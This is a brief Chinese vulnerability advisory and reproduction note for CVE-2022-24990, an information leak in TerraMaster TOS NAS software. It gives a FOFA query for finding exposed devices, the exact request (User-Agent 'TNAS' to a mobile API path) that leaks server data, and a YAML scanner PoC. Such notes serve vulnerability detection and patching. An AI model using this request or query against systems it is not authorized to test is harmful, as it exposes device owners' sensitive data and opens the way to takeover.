1.TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990

1.1.漏洞描述

TerraMaster TOS 存在信息泄漏漏洞，攻击者通过漏洞可以获取服务器上的敏感信息，配合 CVE-2022-24989漏洞可以获取服务器权限

1.2.漏洞影响

TerraMaster TOS < 4.2.31

1.3.FOFA

“TerraMaster” && header=“TOS”

1.4.漏洞复现

登录界面如下：

添加 User-Agent: TNAS, 我们就可以调用这个方法来获取服务器中敏感信息

/module/api.php?mobile/webNasIPS

1.5.poc

params: []
name: TerraMaster TOS 信息泄漏漏洞
set: {}
rules:
- method: GET
  path: /module/api.php?mobile/webNasIPS
  headers:
    'User-Agent: ': TNAS
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"webNasIPS successful")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""